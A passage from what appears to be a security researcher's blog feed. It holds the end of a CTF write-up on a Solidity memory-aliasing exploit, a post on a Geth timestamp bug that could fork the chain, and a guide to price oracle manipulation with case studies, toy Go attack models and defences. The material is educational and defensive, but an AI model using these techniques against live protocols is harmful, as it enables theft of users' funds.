You could try minting and burning LP tokens, but you'll find that the invariants appear to be correctly maintained and that you can't mint more LP tokens than you deserve, or burn more LP tokens than you have.

Finally, just to really drive the point home, all functions are marked nonReentrant.

At this point, the challenge is looking pretty hopeless so under contest conditions it's perfectly reasonable to just drop it and move onto a different problem. However, now that we have all the time in the world, how might we tackle this?

Well, keen observers might notice that the win condition is slightly different in this challenge. In every other challenge, it's always required to drain the entire contract of all assets. However, in this challenge, you only need to drain a percentage. Why might this be?

Everything Is Intentional

One of the lessons I've learned the hard way is that everything in a CTF, no matter how innocuous, is intentional. In this sense, the win condition is a subtle hint towards what the solution requires. The fact that you don't need to drain all of the assets to win should strongly suggest that it's in fact impossible to drain all of the assets.

But what does this mean for us? Working from first principles, we can reset our assumptions by following this chain of logic:

  1. We need to remove (some, but not all) assets from the pool
  2. The only way for assets to leave the pool is through a swap or a burn
  3. Swapping appears to be correctly implemented such that no assets can be stolen
  4. Burning also appears to be correctly implemented such that no assets can be stolen
  5. However, while swapping is a single-step process, burning is a two-step process where the first step is somehow acquiring LP tokens. The burn operation itself says nothing about where the LP tokens come from, so there must be a way to get free LP tokens

The subtle hint also reinforces this theory. Assuming that we can't steal the LP tokens from the setup contract, we'll never be able to burn 100% of all LP tokens and so we'll never be able to drain the entire contract.

Under the assumption that there must be a way to get free LP tokens, can you figure out what the solution is?

No Matter How Improbable

There are only two ways to get LP tokens. The first is to mint them, and the second is to receive them from someone else. We've already established that the ERC20 implementation is sound (although you may want to double-check that before committing yourself to the more challenging route) which leaves us with the mint function.

     struct MintVars {
        uint totalSupply;
        uint totalBalanceNorm;
        uint totalInNorm;
        uint amountToMint;
        
        ERC20Like token;
        uint has;
        uint preBalance;
        uint postBalance;
        uint deposited;
    }
 
    function mint(uint[] memory amounts) public nonReentrant returns (uint) {
        MintVars memory v;
        v.totalSupply = supply;
        
        for (uint i = 0; i < underlying.length; i++) {
            v.token = underlying[i];
            
            v.preBalance = v.token.balanceOf(address(this));
            
            v.has = v.token.balanceOf(msg.sender);
            if (amounts[i] > v.has) amounts[i] = v.has;
            
            v.token.transferFrom(msg.sender, address(this), amounts[i]);
            
            v.postBalance = v.token.balanceOf(address(this));
            
            v.deposited = v.postBalance - v.preBalance;

            v.totalBalanceNorm += scaleFrom(v.token, v.preBalance);
            v.totalInNorm += scaleFrom(v.token, v.deposited);
        }
        
        if (v.totalSupply == 0) {
            v.amountToMint = v.totalInNorm;
        } else {
            v.amountToMint = v.totalInNorm * v.totalSupply / v.totalBalanceNorm;
        }
        
        supply += v.amountToMint;
        balances[msg.sender] += v.amountToMint;
        
        return v.amountToMint;
    }

The goal now is to somehow adjust v.amountToMint such that we are minted way more LP tokens than we deserve. We can start by reviewing the function itself again, but this time with a fine-tooth comb. The function begins by constructing an object to represent the local variables. Then, for each token, we record the current balance of the AMM as well as the balance of the sender. If the amount to be deposited is greater than the sender's balance, then we update the amount requested. We perform the transfer, record the current balance again, then update the total deposited counters appropriately.

Nothing is immediately obvious, so we must begin eliminating the impossible and leave ourselves with only the improbable. Unfortunately, sometimes we might not know enough to immediately differentiate between the impossible and the improbable, so we'll need to keep an open mind.

We can again reset our assumptions by working from first principles using the following chain of logic:

  1. We clearly need to change v.amountToMint in such a way that the value is larger than what it should be
  2. The equation to calculate the amount to mint is implemented correctly
  3. Therefore, there must be another way to either tamper with v.amountToMint directly or to tamper with one of the values it depends on.

Do you see any way to do this, even if it seems impossible or improbable at first?

True Names Have Power

Notice that v.amountToMint is a field on MintVars memory v. This means that any time we write to v.amountToMint, we're actually writing to memory. Unlike data on the stack (recall that the EVM is a stack-based VM), data in memory can be aliased, meaning that the same data can be accessed through multiple symbolic names.

It just so happens that we have two pointers to memory in scope. The first is MintVars memory v, and the second is uint[] memory amounts. If we could somehow cause the latter to point to the same memory address as the former, then we could trigger undefined behavior by updating one through the other.

In order to understand where the amounts variable comes from, we'll first take a brief detour to the land of the Solidity ABI. All transactions are but blobs of data, and it's the job of the ABI to define a standard way of parsing that blob into structured information. Before a contract's code is executed, Solidity inserts some logic which decodes the transaction data into the types that the code expects. Only then does the contract begin executing.

In the case of mint(uint256[]), the ABI decoder will decode the transaction data into a single array of uint256. Is there some way that we can trick the ABI decoder into causing the decoded array to alias with the MintVars object constructed later?

Around the World

According to the Solidity documentation, the ABI encoding of an array is as follows:

<- 32 bytes ->

OOOOO....OOOOO [offset to array start]
    [....]
LLLLL....LLLLL [length in words]
DDDDD....DDDDD [data #1]
DDDDD....DDDDD [data #2]
    [....]
DDDDD....DDDDD [data #L]

To parse that data, the ABI decoder runs the following pseudocode:

function decodeArrayAt(uint arg) private returns (bytes memory) {
    uint offset = read(0x04+0x20*arg);
    uint length = read(0x04+offset);
    bytes memory data = malloc(length);
    memcpy(data, 0x04 + offset + 0x20, length);
    return data;
}

So far so good. Let's take a look at how malloc is implemented, again in pseudocode:

function malloc(uint size) private returns (bytes memory) {
    bytes memory buf;
    assembly {
        buf := mload(0x40)
        mstore(0x40, add(add(buf, size), 0x20))
        mstore(buf, size)
    }
    return buf;
}

Solidity uses what is known as a linear memory allocator (or arena-based allocator). This just means that Solidity will allocate new memory linearly along the block of total available memory. To allocate a new chunk, Solidity reads the free-memory pointer stored at 0x40 to determine where the next free address is, and moves it forward to reflect the fact that a new chunk of memory was just allocated.

Notice that there are no checks to ensure that the amount of memory requested is not excessively large. This means that if one were to allocate a specific amount of memory, the free memory pointer might overflow and begin re-allocating in-use memory. In this case, two calls to the pseudo-malloc might return pointers which alias each other.

Fortunately for us, we can control exactly the size of memory the allocator will allocate simply by changing the ABI-encoded representation of our array. This lets us cause the allocator to allocate v over top of our amounts array.

Can you figure out the final step to solving this challenge?

Technical Difficulties

Because v and amounts now alias each other, both will share the same values and updating one will update the other. This means that while you can manipulate v by writing into amounts, the reverse is true as well.

As such, if you just tried to force some initial values into v by calling mint with some custom values, you might've found that your data kept getting clobbered by the writes to v.totalSupply, v.totalBalanceNorm, and v.totalInNorm. This means that some careful planning is needed to make sure that your values stay consistent over all four iterations of the loop.

Additionally, v.amountToMint is updated after the four iterations, meaning that even if we try to write directly to amounts[3], it'll just be overwritten with the correctly calculated value in the end. This means that we'll need to either make v.totalInNorm or v.totalSupply extremely big, or make v.totalBalanceNorm extremely small.

To do this, we first swap out all of the stablecoins in the AMM except for DAI. This means that v.totalBalanceNorm will not increase after the first iteration because the AMM has no balance. This just makes our lives a bit easier later on.

Next, we'll purchase the right amount of DAI/TUSD/USDC such that when amounts[i] = v.has is executed, we'll write our desired values into v. The balance of DAI will be written to v.totalSupply, so we'll want to set this to a large number such as 10000e18. The balance of TUSD will be written to v.totalBalanceNorm, so we'll update that to 1. Finally, the balance of USDC will be written to v.totalInNorm so we'll also set that to 10000e18. There's no point manipulating the USDT balance because the value will be clobbered anyways.

Finally, we just need to assemble our payload and send the transaction, giving us the flag we worked so hard for: PCTF{hon3y_1_Ov3rFLOw3d_7h3_M3MOry}.

You can find the official solution here.

Conclusion

This was by far the most complex challenge in the CTF and for good reason - it made use of a vulnerability that most people haven't heard of and very few people actively think about. It also challenged basic assumptions about what Solidity source code really does. However, I think it made for a great exercise in solving problems from first principles, eliminating assumptions, and exploring the entire search space. Hopefully you enjoyed this writeup and I'll see you next year at Paradigm CTF 2022!

]]>
<![CDATA[The Block Mined In January, 584942419325]]>https://samczsun.com/the-block-mined-in-january-584942419325/605d68558b092400019e9ed2Tue, 30 Mar 2021 15:01:31 GMT

This is the first in a series of blog posts about the bugs I've found in go-ethereum (Geth), the official Golang implementation of the Ethereum protocol. While you don't need a deep understanding of Geth in order to follow these blog posts, knowledge of how Ethereum itself works will be helpful.

This first post is about a bug in Geth's uncle validation routine which did not behave correctly given a specially crafted uncle. If exploited, this could have caused an accidental fork between Geth and Parity nodes.

Blocks and Uncles

Every blockchain has a canonical chain, which is defined through some metric like the total length of the chain or the amount of work required to produce it. However, network latency means that sometimes two blocks can be produced at the same time. Only one block can be included in the canonical chain, so the other block must be left out.

Some blockchains such as Bitcoin will completely ignore these blocks, rendering them orphaned from the canonical chain. Other blockchains such as Ethereum will still reward miners who put in the effort but rolled a nat 1 on block propagation. In Ethereum, these orphaned blocks that still get included are known as uncles.

An uncle needs to satisfy certain conditions in order to be considered valid. First, all of the block's properties must be valid according to normal consensus rules, and second, an uncle block must be the child of a block at most 6 blocks away from the current head of the chain. However, one exception applies: while normal blocks must not be more than 15 seconds in the future, an uncle block is not restricted in this way.

A Brief Interlude on Integers

Most programming languages have the concept of platform-dependent integers and fixed-width integers. Platform-dependent integers may be 32 bits or 64 bits (or something else!) depending on the platform that the program was compiled on. In C/C++ and Go you might use uint while in Rust you might use usize.

However, sometimes the programmer might want to guarantee that their variable can hold 64 bits of data, even if the platform is 32-bit. In these cases, the programmer can use a fixed-width integer type. In C/C++ that would be uint64_t, in Go uint64, and in Rust u64.

The benefit of these built-in integer types is that they're all first-class citizens and thus are very simple to use. Consider this implementation of the Collatz Conjecture which supports 64-bit integers.

func collatz(n uint64) uint64 {
    if n%2 == 0 {
        return n / 2
    } else {
        return 3*n + 1
    }
}

However, this implementation has a slight flaw: it doesn't support inputs which are larger than 64 bits. For that, we'll need big integers. Most languages support this either within the standard library itself such as big.Int in Go, or through external libraries for C/C++ or Rust.

Unfortunately, using big integers has a big downside: they're much clunkier to use. This is illustrated in the reimplementation of the Collatz Conjecture, but supporting arbitrarily large integers.

var big0 = big.NewInt(0)
var big1 = big.NewInt(1)
var big2 = big.NewInt(2)
var big3 = big.NewInt(3)

func collatzBig(n *big.Int) *big.Int {
	if new(big.Int).Mod(n, big2).Cmp(big0) == 0 {
		return new(big.Int).Div(n, big2)
	} else {
		v := new(big.Int).Mul(big3, n)
		v.Add(v, big1)
		return v
	}
}

Clearly, the 64-bit version is much simpler to write and read, and so it's no surprise that programmers like to use simple integer types when possible.

Expectation vs Reality

In Ethereum, most data is expected to fit within 256 bits, although some fields are only expected to be an integer value with no limit on size. Notably, the block timestamp H_s is defined to be a 256-bit integer.

Ethereum Yellow Paper, page 6

The Geth team attempted to be faithful to this definition by validating that the timestamp on an uncle block was not larger than 2^256 - 1. Recall that uncles have no restrictions on future mining.

// Verify the header's timestamp
if uncle {
    if header.Time.Cmp(math.MaxBig256) > 0 {
        return errLargeBlockTime
    }
} else {
    if header.Time.Cmp(big.NewInt(time.Now().Add(allowedFutureBlockTime).Unix())) > 0 {
        return consensus.ErrFutureBlock
    }
}
Source

Unfortunately, the code then immediately coerced the block timestamp into a 64-bit integer in order to calculate the correct difficulty for the block.

// Verify the block's difficulty based in it's timestamp and parent's difficulty
expected := ethash.CalcDifficulty(chain, header.Time.Uint64(), parent)
Source

This would not be so bad if Parity behaved in the same way, but Parity would saturate the timestamp at 2^64 - 1 instead of overflowing.

let mut blockheader = Header {
    parent_hash: r.val_at(0)?,
    uncles_hash: r.val_at(1)?,
    author: r.val_at(2)?,
    state_root: r.val_at(3)?,
    transactions_root: r.val_at(4)?,
    receipts_root: r.val_at(5)?,
    log_bloom: r.val_at(6)?,
    difficulty: r.val_at(7)?,
    number: r.val_at(8)?,
    gas_limit: r.val_at(9)?,
    gas_used: r.val_at(10)?,
    timestamp: cmp::min(r.val_at::<U256>(11)?, u64::max_value().into()).as_u64(),
    extra_data: r.val_at(12)?,
    seal: vec![],
    hash: keccak(r.as_raw()).into(),
};
Source

This means that if a malicious miner included an uncle with a block timestamp of 584942419325-01-27 07:00:16 UTC, or unix time 2^64, then Geth would calculate the difficulty using unix time 0 (the value wrapped around) while Parity would calculate the difficulty using unix time 2^64 - 1. These two values would be different, so one of the two clients would have split from the canonical chain after failing to verify the block.

The Geth team fixed this bug in PR 19372, which switched all timestamps to use uint64.

Conclusion

Every client participating in a consensus protocol must behave identically, so what may seem like a completely benign operation might actually be the trigger that causes half of the network to disconnect. This also goes to show that you don't need to be highly technical in order to find impactful bugs, so if this seems like something you'd be interested in, there's no better way to get started than to dive right in.

Next time, we'll be exploring how Geth stores the data that makes up Ethereum, and how a skilled attacker could have planted a ticking time bomb that would hard fork the chain when detonated.

]]>
<![CDATA[So you want to use a price oracle]]>https://samczsun.com/so-you-want-to-use-a-price-oracle/5fa974f6c9ce5800018a69aeMon, 09 Nov 2020 19:56:37 GMT

In late 2019, I published a post titled “Taking undercollateralized loans for fun and for profit”. In it, I described an economic attack on Ethereum dApps that rely on accurate price data for one or more tokens. It's currently late 2020, and unfortunately numerous projects have since made very similar mistakes, with the most recent example being the Harvest Finance hack, which resulted in a collective loss of 33MM USD for protocol users.

While developers are familiar with vulnerabilities like reentrancy, price oracle manipulation is clearly not something that is often considered. Indeed, exploits based on reentrancy have fallen over the years while exploits based on price oracle manipulation are now on the rise. As such, I decided it was time that someone published a definitive resource on price oracle manipulation.

This post is broken down into three sections. For those who are unfamiliar with the subject, there is an introduction to oracles and oracle manipulation. Those who want to test their knowledge may skip ahead to the case studies, where we review past oracle-related vulnerabilities and exploits. Finally, we wrap up with some techniques developers can apply to protect their projects from price oracle manipulation.

Oracle manipulation in real life

Wednesday, December 1st, 2015. Your name is David Spargo and you’re at the Peking Duk concert in Melbourne, Australia. You’d like to meet the band in person but between you and backstage access stand two security guards, and there’s no way they would let some average Joe walk right in.

How would the security guards react, you wonder, if you simply acted like you belonged. Family members would surely be allowed to visit the band backstage, so all you had to do was convince the security guards that you were a relative. You think about it for a bit and come up with a plan that can only be described as genius or absolutely bonkers.

After quickly setting everything up, you confidently walk up to the security guards. You introduce yourself as David Spargo, family of Peking Duk. When the guard asks for proof, you show them the irrefutable evidence - Wikipedia.

The guard waves you through and asks you to wait. A minute passes, then two. After five minutes, you wonder if you should make a run for it before law enforcement makes an appearance. As you’re about to bail, Reuben Styles walks up and introduces himself. You walk with him to the green room where the band was so impressed with your ingenuity that you end up sharing a few beers together. Later, they share what happened on their Facebook page.

What is a price oracle?

A price oracle, generously speaking, is anything that you consult for price information. When Pam asks Dwight for the cash value of a Schrute Buck, Dwight is acting as a price oracle.

On Ethereum, where everything is a smart contract, price oracles are no exception. As such, it's more useful to distinguish price oracles by how they get their price information. With one approach, you can simply take existing off-chain price data from price APIs or exchanges and bring it on-chain. With the other, you can calculate the instantaneous price by consulting on-chain decentralized exchanges.

Both options have their respective advantages and disadvantages. Off-chain data is generally slower to react to volatility, which may be good or bad depending on what you’re trying to use it for. It typically requires a handful of privileged users to push the data on-chain though, so you have to trust that they won’t turn evil and can’t be coerced into pushing bad updates. On-chain data doesn’t require any privileged access and is always up-to-date, but this means that it’s easily manipulated by attackers which can lead to catastrophic failures.

What could possibly go wrong?

Let’s take a look at a few cases where a poorly integrated price oracle resulted in significant financial damage to a DeFi project.

Synthetix sKRW Oracle Malfunction

Synthetix is a derivatives platform which allows users to be exposed to assets such as other currencies. To facilitate this, Synthetix (at the time) relied on a custom off-chain price feed implementation wherein an aggregate price calculated from a secret set of price feeds was posted on-chain at a fixed interval. These prices then allowed users to take long or short positions against supported assets.

On June 25, 2019, one of the price feeds that Synthetix relied on mis-reported the price of the Korean Won to be 1000x higher than the true rate. Due to additional errors elsewhere in the price oracle system, this price was accepted by the system and posted on-chain, where a trading bot quickly traded in and out of the sKRW market.

In total, the bot was able to earn a profit of over 1B USD, although the Synthetix team was able to negotiate with the trader to return the funds in exchange for a bug bounty.

Synthetix correctly implemented the oracle contract and pulled prices from multiple sources in order to prevent traders from predicting price changes before they were published on-chain. However, an isolated case of one upstream price feed malfunctioning resulted in a devastating attack. This illustrates the risk of using a price oracle which uses off-chain data: you don't know how the price is calculated, so your system must be carefully designed such that all potential failure modes are handled properly.

Undercollateralized Loans

As mentioned earlier, I published a post in September 2019 outlining the risks associated with using price oracles that relied on on-chain data. While I highly recommend reading the original post, it is quite long and heavy in technical details which may make it hard to digest. Therefore, I’ll be providing a simplified explanation here.

Imagine you wanted to bring decentralized lending to the blockchain. Users are allowed to deposit assets as collateral and borrow other assets up to a certain amount determined by the value of the assets they’ve deposited. Let’s assume that a user wants to borrow USD using ETH as collateral, that the current price of ETH is 400 USD, and that the collateralization ratio is 150%.

If the user deposits 375 ETH, they'll have deposited 150,000 USD of collateral. Since they can borrow 1 USD for every 1.5 USD of collateral, they'll be able to borrow a maximum of 100,000 USD from the system.

But of course, on the blockchain it’s not as simple as simply declaring that 1 ETH is worth 400 USD because a malicious user could simply declare that 1 ETH is worth 1,000 USD and then take all the money from the system. As such, it’s tempting for developers to reach for the nearest price oracle shaped interface, such as the current spot price on Uniswap, Kyber, or another decentralized exchange.

At first glance, this appears to be the correct thing to do. After all, Uniswap prices are always roughly correct whenever you want to buy or sell ETH, as any deviations are quickly corrected by arbitrageurs. However, as it turns out, the spot price on a decentralized exchange may be wildly incorrect during a transaction, as shown in the example below.

Consider how a Uniswap reserve functions. The price is calculated based on the amount of assets held by the reserve, but the assets held by the reserve change as users trade between ETH and USD. What if a malicious user performs a trade before and after taking a loan from your platform?

Before the user takes out a loan, they buy 5,000 ETH for 2,000,000 USD. The Uniswap exchange now calculates the price to be 1 ETH = 1,733.33 USD. Now, their 375 ETH can act as collateral for up to 433,333.33 USD worth of assets, which they borrow. Finally, they trade back the 5,000 ETH for their original 2,000,000 USD, which resets the price. The net result is that your loan platform just allowed the user to borrow an additional 333,333.33 USD without putting up any collateral.
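To see why the mid-transaction spot price is dangerous, here is a toy Go model of a constant-product pool combined with the lending rule from earlier. The reserve sizes are hypothetical (chosen so ETH starts at 400 USD) and fees are ignored, so the exact numbers differ from the illustration above, but the mechanics are the same: buy ETH to inflate the spot price, borrow against the inflated price, then unwind the trade.

```go
package main

import "fmt"

// Pool is a toy constant-product (x*y=k) market, like a Uniswap V2 pair.
// Fees are ignored for simplicity.
type Pool struct {
	ETH, USD float64
}

// Spot returns the instantaneous price of 1 ETH in USD.
func (p *Pool) Spot() float64 { return p.USD / p.ETH }

// BuyETH swaps usdIn into the pool and returns the ETH received,
// keeping the product of the reserves constant.
func (p *Pool) BuyETH(usdIn float64) float64 {
	k := p.ETH * p.USD
	p.USD += usdIn
	ethOut := p.ETH - k/p.USD
	p.ETH -= ethOut
	return ethOut
}

// SellETH swaps ethIn into the pool and returns the USD received.
func (p *Pool) SellETH(ethIn float64) float64 {
	k := p.ETH * p.USD
	p.ETH += ethIn
	usdOut := p.USD - k/p.ETH
	p.USD -= usdOut
	return usdOut
}

// maxBorrow is the lending platform's rule: 1 USD of debt per
// 1.5 USD of collateral, valued at the pool's spot price.
func maxBorrow(collateralETH, spot float64) float64 {
	return collateralETH * spot / 1.5
}

func main() {
	// Hypothetical reserves pricing ETH at 400 USD.
	p := &Pool{ETH: 10000, USD: 4000000}
	collateral := 375.0

	fmt.Printf("honest borrow limit: %.2f USD\n", maxBorrow(collateral, p.Spot()))

	// Attacker pushes the spot price up mid-transaction...
	eth := p.BuyETH(2000000)
	fmt.Printf("manipulated spot: %.2f, inflated limit: %.2f USD\n",
		p.Spot(), maxBorrow(collateral, p.Spot()))

	// ...borrows against the inflated price, then unwinds the trade.
	p.SellETH(eth)
	fmt.Printf("spot after unwind: %.2f\n", p.Spot())
}
```

With these reserves, a 2,000,000 USD trade more than doubles the spot price for the duration of the transaction, and the borrow limit is inflated accordingly even though the attacker ends up holding the same assets they started with.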

This case study illustrates the most common mistake when using a decentralized exchange as a price oracle - an attacker has almost full control over the price during a transaction and trying to read that price accurately is like reading the weight on a scale before it’s finished settling. You’ll probably get the wrong number and depending on the situation it might cost you a lot of money.

Synthetix MKR Manipulation

In December 2019, Synthetix suffered another attack as a result of price oracle manipulation. What’s notable about this one is that it crossed the barrier between on-chain price data and off-chain price data.

Reddit user u/MusaTheRedGuard observed that an attacker was making some very suspicious trades against sMKR and iMKR (inverse MKR). The attacker first purchased a long position on MKR by buying sMKR, then purchased large quantities of MKR from the Uniswap ETH/MKR pair. After waiting a while, the attacker sold their sMKR for iMKR and sold their MKR back to Uniswap. They then repeated this process.

Behind the scenes, the attacker’s trades through Uniswap allowed them to move the price of MKR on Synthetix at will. This was likely because the off-chain price feed that Synthetix relied on was in fact relying on the on-chain price of MKR, and there wasn’t enough liquidity for arbitrageurs to reset the market back to optimal conditions.

This incident illustrates the fact that even if you think you’re using off-chain price data, you may still actually be using on-chain price data and you may still be exposed to the intricacies involved with using that data.

The bZx Hack

In February 2020, bZx was hacked twice over the span of several days for approximately 1MM USD. You can find an excellent technical analysis of both hacks written by palkeo here, but we will only be looking at the second hack.

In the second hack, the attacker first purchased nearly all of the sUSD on Kyber using ETH. Then, the attacker purchased a second batch of sUSD from Synthetix itself and deposited it on bZx. Using the sUSD as collateral, the attacker borrowed the maximum amount of ETH they were allowed to. They then sold back the sUSD to Kyber.

If you’ve been paying attention, you’ll recognize this as essentially the same undercollateralized loan attack, but using a different collateral and a different decentralized exchange.

yVault Bug

On July 25, 2020, I reported a bug to yEarn regarding the launch of their new yVault contracts. You can read the official writeup about this bug here, but I will briefly summarize it below.

The yVault system allows users to deposit a token and earn yield on it without needing to manage it themselves. Internally, the vault tracks the total amount of yVault tokens minted as well as the total amount of underlying tokens deposited. The worth of a single yVault token is given by the ratio of underlying tokens deposited to yVault tokens minted. Any yield the vault earns is spread across all minted yVault tokens (and therefore, across all yVault token holders).

The first yVault allowed users to earn yield on USDC by supplying liquidity to the Balancer MUSD/USDC pool. When a user supplies liquidity to Balancer pools, they receive BPT in return which can be redeemed for a proportion of the pool. As such, the yVault calculated the value of its holdings based on the amount of MUSD/USDC which could be redeemed with its BPT.

This seems like the correct implementation, but unfortunately the same principle as before applies - the state of the Balancer pool during a transaction is not stable and cannot be trusted. In this case, because of the bonding curve that Balancer chose, a user who swaps from USDC to MUSD will not receive a 1:1 exchange rate, but will in fact leave behind some MUSD in the pool. This means that the value of BPT can be temporarily inflated, which allows an attacker to manipulate the price at will and subsequently drain the vault.

This incident shows that price oracles are not always conveniently labelled as such, and that developers need to be vigilant about what sort of data they’re ingesting and consider whether that data can be easily manipulated by an unprivileged user.

Harvest Finance Hack

On October 26, 2020, an unknown user hacked the Harvest Finance pools using a technique that you can probably guess by now. You can read the official post-mortem here, but once again I’ll summarize it for you: the attacker deflated the price of USDC in the Curve pool by performing a trade, entered the Harvest pool at the reduced price, restored the price by reversing the earlier trade, and exited the Harvest pool at a higher price. This resulted in over 33MM USD of losses.
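The pattern common to the yVault bug and the Harvest hack can be captured in a stylized Go model. This is not Harvest's actual accounting, just a sketch: the vault prices its shares off a reported value of its holdings, and that reported value is something the attacker can temporarily deflate (here modeled as a simple +/- 50 adjustment standing in for the pool trade).

```go
package main

import "fmt"

// Vault tracks total shares against the externally reported value of
// its holdings; in Harvest's case that value came from a Curve pool.
type Vault struct {
	Shares float64 // total vault shares minted
	Value  float64 // reported value of the vault's holdings
}

// Deposit mints shares pro rata against the reported value.
func (v *Vault) Deposit(amount float64) float64 {
	minted := amount * v.Shares / v.Value
	v.Shares += minted
	v.Value += amount
	return minted
}

// Withdraw burns shares pro rata against the reported value.
func (v *Vault) Withdraw(shares float64) float64 {
	out := shares * v.Value / v.Shares
	v.Shares -= shares
	v.Value -= out
	return out
}

func main() {
	v := &Vault{Shares: 1000, Value: 1000}

	v.Value -= 50             // attacker's trade deflates the reported value
	shares := v.Deposit(1000) // enter at the artificially low share price
	v.Value += 50             // reversing the trade restores the value
	out := v.Withdraw(shares) // exit at the restored share price

	fmt.Printf("deposited 1000.00, withdrew %.2f\n", out)
}
```

The attacker's deposit mints more shares than it should, so when the reported value snaps back, the extra value comes straight out of the positions of every other depositor.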

How do I protect myself?

By now, I hope that you’ve learned to recognize the common thread - it's not always obvious that you're using a price oracle and if you don't follow the proper precautions, an attacker could trick your protocol into sending them all of your money. While there’s no one-size-fits-all fix that can be prescribed, here are a few solutions that have worked for other projects in the past. Maybe one of them will apply to you too.

Shallow Markets, No Diving

Like diving into the shallow end of a pool, diving into a shallow market is painful and might result in significant expenses which will change your life forever. Before you even consider the intricacies of the specific price oracle you’re planning to use, consider whether the token is liquid enough to warrant integration with your platform.

A Bird in the Hand is Worth Two in the Bush

It may be mesmerizing to see the potential exchange rate on Uniswap, but nothing’s final until you actually click trade and the tokens are sitting in your wallet. Similarly, the best way to know for sure the exchange rate between two assets is to simply swap the assets directly. This approach is great because there’s no take-backs and no what-ifs. However, it may not work for protocols such as lending platforms which are required to hold on to the original asset.

Almost Decentralized Oracles

One way to summarize the problem with oracles that rely on on-chain data is that they’re a little too up-to-date. If that’s the case, why not introduce a bit of artificial delay? Write a contract which updates itself with the latest price from a decentralized exchange like Uniswap, but only when requested by a small group of privileged users. Now even if an attacker can manipulate the price, they can’t get your protocol to actually use it.

This approach is really simple to implement and is a quick win, but there are a few drawbacks - in times of chain congestion you might not be able to update the price as quickly as you’d like, and you’re still vulnerable to sandwich attacks. Also, now your users need to trust that you’ll actually keep the price updated.
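A minimal sketch of this pattern in Go (the real thing would be a smart contract, and spotPrice here is a hypothetical stand-in for querying a DEX pair):

```go
package main

import (
	"errors"
	"fmt"
)

// spotPrice stands in for reading a DEX's instantaneous price;
// in a real deployment this would query e.g. a Uniswap pair.
func spotPrice() float64 { return 400.0 }

// CachedOracle serves the last pushed price. Only callers in updaters
// may refresh it, so an attacker who skews the DEX price mid-transaction
// can't force consumers to read the skewed value.
type CachedOracle struct {
	price    float64
	updaters map[string]bool
}

// Update refreshes the cached price, but only for privileged callers.
func (o *CachedOracle) Update(caller string) error {
	if !o.updaters[caller] {
		return errors.New("not a privileged updater")
	}
	o.price = spotPrice()
	return nil
}

// Price returns the last cached price, not the live spot price.
func (o *CachedOracle) Price() float64 { return o.price }

func main() {
	o := &CachedOracle{updaters: map[string]bool{"keeper": true}}
	if err := o.Update("attacker"); err != nil {
		fmt.Println("rejected:", err)
	}
	o.Update("keeper")
	fmt.Println("cached price:", o.Price())
}
```

Consumers always read the cached value, so manipulating the underlying DEX only matters if a privileged updater happens to push during the manipulated window.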

Speed Bumps

Manipulating price oracles is a time-sensitive operation because arbitrageurs are always watching and would love the opportunity to optimize any suboptimal markets. If an attacker wants to minimize risk, they’ll want to do the two trades required to manipulate a price oracle in a single transaction so there’s no chance that an arbitrageur can jump in the middle. As a protocol developer, if your system supports it, it may be enough to simply implement a delay of as short as 1 block between a user entering and exiting your system.

Of course, this might impact composability, and miner collaboration with traders is on the rise. In the future, it may be possible for bad actors to perform price oracle manipulation across multiple transactions knowing that the miner they’ve partnered with will guarantee that no one can jump in the middle and take a bite out of their earnings.
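A speed bump of this kind can be sketched in a few lines of Go (in a real protocol this logic would live in the contract, keyed on block.number):

```go
package main

import (
	"errors"
	"fmt"
)

// SpeedBump records the block in which each user entered the system and
// refuses exits in that same block, forcing a would-be manipulator to
// span at least two blocks and expose themselves to arbitrageurs.
type SpeedBump struct {
	entered map[string]uint64 // user -> block number of entry
}

// Enter records the block in which the user entered.
func (s *SpeedBump) Enter(user string, block uint64) {
	s.entered[user] = block
}

// Exit succeeds only if at least one block has passed since entry.
func (s *SpeedBump) Exit(user string, block uint64) error {
	if entry, ok := s.entered[user]; ok && block <= entry {
		return errors.New("must wait at least one block before exiting")
	}
	delete(s.entered, user)
	return nil
}

func main() {
	s := &SpeedBump{entered: make(map[string]uint64)}
	s.Enter("attacker", 100)
	fmt.Println(s.Exit("attacker", 100)) // rejected: same block
	fmt.Println(s.Exit("attacker", 101)) // allowed: one block later
}
```

Even a one-block delay is enough to break the single-transaction atomicity that most oracle manipulation relies on.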

Time-Weighted Average Price (TWAP)

Uniswap V2 introduced a TWAP oracle for on-chain developers to use. The documentation goes into more detail on the exact security guarantees that the oracle provides, but in general for large pools over a long period of time with no chain congestion, the TWAP oracle is highly resistant to oracle manipulation attacks. However, due to the nature of its implementation, it may not respond quickly enough to moments of high market volatility and only works for assets for which there is already a liquid token on-chain.
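The accumulator mechanism behind the TWAP oracle can be sketched in Go with hypothetical prices and timestamps; note how a one-second spike to 4,000 USD barely moves a 20-minute TWAP:

```go
package main

import "fmt"

// Accumulator implements a Uniswap V2-style cumulative price: every
// time the pool is touched, it adds spot price * elapsed seconds.
type Accumulator struct {
	cumulative float64 // running sum of price * seconds
	lastTime   uint64
	lastPrice  float64
}

// Update records that lastPrice held from lastTime until now, then
// starts accumulating at the new price.
func (a *Accumulator) Update(now uint64, price float64) {
	a.cumulative += a.lastPrice * float64(now-a.lastTime)
	a.lastTime = now
	a.lastPrice = price
}

// TWAP between two accumulator snapshots is the difference in the
// cumulative values divided by the elapsed time.
func TWAP(cum0, cum1 float64, t0, t1 uint64) float64 {
	return (cum1 - cum0) / float64(t1-t0)
}

func main() {
	a := &Accumulator{lastTime: 0, lastPrice: 400}
	cum0, t0 := a.cumulative, a.lastTime

	// Price sits at 400 for 600s, spikes to 4000 for a single
	// second, then returns to 400 for another 599s.
	a.Update(600, 4000)
	a.Update(601, 400)
	a.Update(1200, 400)

	fmt.Printf("TWAP: %.2f\n", TWAP(cum0, a.cumulative, t0, a.lastTime)) // TWAP: 403.00
}
```

A 10x price spike held for one second only moves the 1,200-second TWAP from 400 to 403, which is exactly why sustaining a manipulation across a long window is so expensive for an attacker.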

M-of-N Reporters

Sometimes they say that if you want something done right, you do it yourself. What if you gather up N trusted friends and ask them each to submit what they think is the right price on-chain, and once at least M of them have reported, the median of their answers becomes the current price?

This approach is used by many large projects today: Maker runs a set of price feeds operated by trusted entities, Compound created the Open Oracle and features reporters such as Coinbase, and Chainlink aggregates price data from Chainlink operators and exposes it on-chain. Just keep in mind that if you choose to use one of these solutions, you’ve now delegated trust to a third party and your users will have to do the same. Requiring reporters to manually post updates on-chain also means that during times of high market volatility and chain congestion, price updates may not arrive on time.
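The aggregation step can be sketched in Go. The minReports threshold and the wild 99999.0 report below are illustrative, not taken from any particular oracle; the point is that a median tolerates a minority of bad reporters.

```go
package main

import (
	"errors"
	"fmt"
	"sort"
)

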